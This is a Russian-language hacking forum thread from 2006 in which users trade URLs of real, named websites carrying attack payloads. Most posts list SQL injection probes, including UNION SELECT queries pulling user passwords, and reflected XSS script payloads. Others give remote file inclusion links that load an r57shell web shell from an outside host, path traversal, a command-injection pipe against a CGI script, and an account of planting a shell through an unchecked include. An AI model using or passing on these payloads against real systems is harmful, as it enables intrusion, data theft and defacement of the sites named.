http://www.kalitka-plitka.ru/catalog/?id=16&sub=32&stuff=28&PHPSESSID=e290f7c002397d6fa05d621d31948b26'
_kREveDKo_
11.06.2006, 22:30
http://www.mail.zp.ua/action.php?action=aff_mail&mail=1&sort=1&folder=INBOX&sortdir=1&lang='
Какой-то левый ТИПА инклуд. Хер поймёшь. В этой строке есть ещё пару уязвимых параметров, но они ничего не дают. Тока ошипку.
http://www.mail.zp.ua/action.php?action=aff_mail&mail=1&sort=1&folder=INBOX&sortdir=1&lang='
Какой-то левый ТИПА инклуд. Хер поймёшь. В этой строке есть ещё пару уязвимых параметров, но они ничего не дают. Тока ошипку.
Бля да шо вы за народ уже мою почту дефейсите вообще наглёж =(
Вот нашел сайт с тестом типа
(Хочешь узнать кое-что про себя? )
ну я в ответы поставил.
'><script>alert('HakNet')</script>
проходит не фильтруетса..
сайт http://www.mostinfo.net/hlam/test/
Нашёл сайт рекламного агенства hxxp://www.proreklamy.ru/. Между прочих услуг есть создание сайта от 500$ и до 1500$. "Ого", - подумал я и решил поискать sql в запросе hxxp://www.proreklamy.ru/?module=custompage&id=6. И что вы думаете? Скрипт инклудит страницу custompage.php без каких-либо проверок!!! Заливаем на народ шелл с расширением php и подставляем в урл - всё, у нас шелл!!! И так сделано большинство их сайтов за 500-1500 зелёных! Я уже молчу про strict'ы или хотя бы transitional - там НЕТ декларации вовсе!
Вывод: главное - PR, а остальное - ничто!
__http://www.dunas.com.br/ing/main.php?inc=filo
__http://www.rus-fish.ru/?pg=xxx
__http://85.10.200.53/imat-uve.de/main.php?inc=%27
__http://pad.chasesdream.com/orion/downloads.php?cat=1%20UNION%20SELECT%200,user_pass word,0,0,0,0,0,0,0%20FROM%20orion_users%20WHERE%20 user_id=2/*
Dracula4ever
14.06.2006, 17:05
http://www.kalina-shanson.com/smi/show.php?id=2'0
blackybr
15.06.2006, 08:31
http://www.sbsonline.org/publications/news/issues/2004_02/story.php?dis=http://someshit.nm.ru/r57shell.php
http://www.opitz.pl/body.php?txt=http://someshit.nm.ru/r57shell.php
http://www.papunet.net/bliss/index.php?pid=246%27
http://www.papunet.net/yleis/txt/tyokalut/ohjelmat/?tiedosto=vinkki_oma.php%27
http://www.fitzmuseum.cam.ac.uk/opac/opac_objectnames.php?_odata=o27&_af=OB&_alpha=A&_callingurl=/opac/opac_objectnames.php%27
http://www.airis.ru/mpage.php?pgname=../../mpage.php&text=
http://www.clubnews.ru/forum/profile.php?mode=sendpassword
http://www.emal.kanash.ru/?dir=http:&page=/someshit.nm.ru/r57shell
back0rifice
15.06.2006, 11:29
XSS на pages.ru (интересно, а кто-нибудь с АЧата на нём хостится ;) ):
_http://www.pages.ru/search.html?text=%3Cscript%3Ealert%28%2Fback0rific e%2F%29%3C%2Fscript%3E&doSearch=%CD%E0%E9%F2%E8 - тройной alert() не хотели, хех :p ?!
Кто-нибудь юзает качалку GetRight? Тогда - держите XSS и не отрывайтесь:
_http://www.headlightinc.com/cgi-bin/faq.cgi?filter=%3Cscript%3Ealert%28%2Fback0rifice% 2F%29%3C%2Fscript%3E&submit1=Search
Dracula4ever
15.06.2006, 15:09
http://www.hce.ru/proekt/cafe_action2.php3?numk=7'
http://books.begin.ru/tops10.phtml?c_id=107'
http://eng.unionmedia.info/structdoc.html?he_id=231&do_id=199'
http://www.hro.org/php/person_info.php?id=467'1
http://www.ligocom.ru/rindex.php?Var=%D0%E0%E1%EE%F2%E0&Var1=Item
http://www.bankir.by/modules.php?name=Qwe&ac=print&id=
http://www.kanzler.sbor.ru/?s=3'5
http://www.goclub.ru/resident.html?id=10&PHPSESSID=e24c3a8efffe63d1e0bc0ea35fac112'2
http://www.ooozao.ru/index.php?id=4'4
http://www.privat.ua/search?page=1&mode=simple&searchString=%27%3E%3Cscript%3Ealert%28%29%3C%2Fsc ript%3E
http://www.kuivstar.net в поиску водим '><script>alert('HakNet')</script>
Dracula4ever
15.06.2006, 22:28
http://www.tvernews.ru/?newsid=116'29
http://www.spidermania.ru/index.php?action=12&id=9'
http://webchess.ru/index.php?module=gallery&file=disp_img&id_img=&stat=ok
http://www.regens.ru/benefits/firms/entrench/
http://ukr-apartments.kiev.ua/apartment.php?PHPSESSID=0b113a9c73caf68cdc7d91becb 27748'5
http://drakkar.good.ru/index.php?act=guest&news_position=-4'
http://www.televek.ru/phones/SonyEricsson/934/&https:/sourceforge.net/projects/fma/&
http://squash.com.ua/rus/news/?page=27&news_id=50'0
http://karatedojo.uazone.net/printitem.php3?newsid=8'
http://www.kcnti.ru/orgot/lookorg.php?id=8'
http://www.vw-club.ru/anno/show_anno.php?id=366'
http://www.algis.ru/main.php?f=21&n=10&id=18'0
http://www.gerdabook.ru/vet/view.php?id=5017'2
_http://www.ce.unipr.it/~ghelfi/Sphinx/body.php?page=
_http://www.edu.ru/modules.php?name=Web_Links&l_op=viewlink&cid=
ВНИМАТЕЛЬНО ЧИТАЕМ ПЕРВЫЙ ПОСТ!!! ССЫЛКИ ОСТАВЛЯТЬ ТОЛЬКО В ТАКОМ ФОРМАТЕ: _http://ваша ссылка
Dracula4ever
16.06.2006, 07:33
http://www.extrovert.ru/?id=929
http://www.multi-tech.ru/index.php?goto=gallery&showimage=34'
http://www.notoshoes.ru/singl.php?tp=2&p=7&tid=33400'
http://www.astmui.ru/index.php?id=news_more&news_id=1'
http://ukr-apartments.kiev.ua/apartment.php?PHPSESSID=0b113a9c73caf68cdc7d91becb 27748'5
http://mediapro.com.ua/news/text.php?id=47'3
http://noclick.net.ru/nav.php
http://www.gruzautoland.ru/auto/show.php?id=5'6
http://www.comquest.ru/news/show_news.php?uid=2'3
http://www.cato.ru/pages/151?idpage=148'
http://www.kaz.kz/top/kom.php?id=1'
http://forumy.ru/chumakov/view.php?dat=20031223133317_1&part=8'
_kREveDKo_
16.06.2006, 21:19
_www.faq-hack.ru
Там лолки, а не админы. Стоит у них сниффер один в один с нашим, ачатовским. Злость пробрала - решил на баги проверить =). Сниффер первый под руку и попался. Там не фильтровалось имя браузера. Буквально 2 минуты на странице сниффера висел замкнутый цикл с алертом в предзноменование того, что я начал ковырять их сайт =).
Теперь к багам... Долго не искал...лень стало...
Нарыл пассивную xss(это в анонимном мэйлере):
_http://faq-hack.ru/onlinesoft/mail/function.php?name=anyname&mymail=antmail&to=asd@asd.ru[XSS]&theme=anytheme
Вторая бага - ошибка скул. Получить её можно, обратившись к снифферу и передав ему в http-заголовке имя браузера с одинарной кавычкой.
_kREveDKo_
16.06.2006, 21:57
_http://customize.ru/gbook/index.php?name="><h1>test1</h1>&mail="><h1>test2</h1>&city="><h1>test3</h1>&mess=anymessage&add=Отправить
Сразу когда по ссыле пройдёте, нифуя не отобразиться. А вот страничку обновите и тогда xss-ки сработают. Просто все данные передаются в кукисы, а когда страницу обновляешь данные из кукисов подставляются в формочки.
Dracula4ever
17.06.2006, 07:11
http://www.vdvsn.ru/forum/dialogue.phtml?id=276&forumName=10&page=1'
http://www.v21v.ru/katalog/index.php?new_item=1'
http://www.melodi.ru/index.php?p=1137482278&step=1'
http://order.referats.info/content.php?wnum=390'8
http://www.seneka.ru/index.php?section=%D0%BF%D0%BE%D1%80%D1%82%D1%84%D 0%BE%D0%BB%D0%B8%D0%BE
http://www.popugay.com/news/printitem.php?newsid=5'
http://html.net/newsletter/default.asp?Email='><script>alert('HakNet')</script>
http://phpt.net/result.php?Keywords='><script>alert()</script>
http://sedoparking.com/parking.php4?task=search&domain=inet.net&trackquery=1&s=e50b14616fbce9a5a577®istrar=&tb=0&partnerid=&language=e&keyword=%27%3E%3Cscript%3Ealert%28%29%3C%2Fscript% 3E
Dracula4ever
17.06.2006, 14:20
http://www.x-telpro.ru/forum.php?action=view&id=784'
http://www.titan-m.ru/tech_nal.html?mode=show&car_id=5'
http://www.tit-personal.ru/default.php?go=show&id=16'
http://www.humanresource.ge/print.php?&post_id=
http://www.flowers-saratov.ru/about.php?go=show&id=5'
degeneration x
17.06.2006, 14:56
Football.ru
_http://football.ru/?page=press_detail&ID=-239+union+select+1,2,3,4,5,6/*
FIFA.com
_http://www.fifa.com/en/news/searchresult.html?searchtext=dg-x%22%3E%3Cscript%3Ealert();%3C/script%3E%3Ca%20href=h
Euro-football.ru
_http://www.euro-football.ru/news/shownews.php3?num=-34233+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16/*
1c-usoft.ru
_http://1c-usoft.ru/vnedrenie/solutions/?act=show_news&id=1582'
Dracula4ever
17.06.2006, 15:07
http://www.rambler.ru/db/news/news.html?s="><script>alert(dracula4ever)</script>
Dracula4ever
17.06.2006, 21:22
_http://www.vdvsn.ru/forum/dialogue.phtml?id=273&forumName=10&page=1'
_http://wmaster.ru/scripts/search.php?keyword=%27%3E%3Cscript%3Ealert%28%2Fas %2F%29%3B%3C%2Fscript%3E
_http://prosto.fm/search/?text=%3Cscript%3Ealert%28%2Fas%2F%29%3B%3C%2Fscri pt%3E
h_ttp://www.happyland-drink.ru/brands.php?id=5'
хай протеус)
http://www.feda.com/login/verify.cfm?action='><script>alert()</script>
Dracula4ever
18.06.2006, 17:21
_http://www.rotik.ru/index.php?action=news&anid=4'
Dracula4ever
18.06.2006, 21:44
_http://www.go2web.ru/search.php?keyword='><script>alert()</script>
_http://mmportal.com.ru/money/mail.php?id=6'6
_http://fotokatalog.ru/kom.php?id=1'9
_http://www.consulting-abv.ru/busprint.php?id=5'
_http://www.mirv.ru/tours.php?action=source&id=221
_http://inews.spb.ru/issue.php?id=9417311320548'08
_http://www.comptorg.ru/index.php?action=price&id=41'
_http://www.master-it.ru/news/content.phtml?aid=2&level=2'
_http://www.gazot.ru/phone.php?idrub=7'
_http://www.bestwatch1.ru/order.phtml?idw=2546'3
_http://www.vokrugsveta.by/hot.php?id=9'
_http://samcomp.zp.ua/news.php?id=9'
_http://www.resonancemedia.ru/resources/news/news_detail.php?newsid=182'
_http://www.en.lv/index.php?m=1&a=114'4
haZard0us
19.06.2006, 01:07
_http://ats.nist.gov/cgi-bin/cgi.tcl/display.cgi?scriptname=|ls%20-la
да и поройтесь, в тех цгишках...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot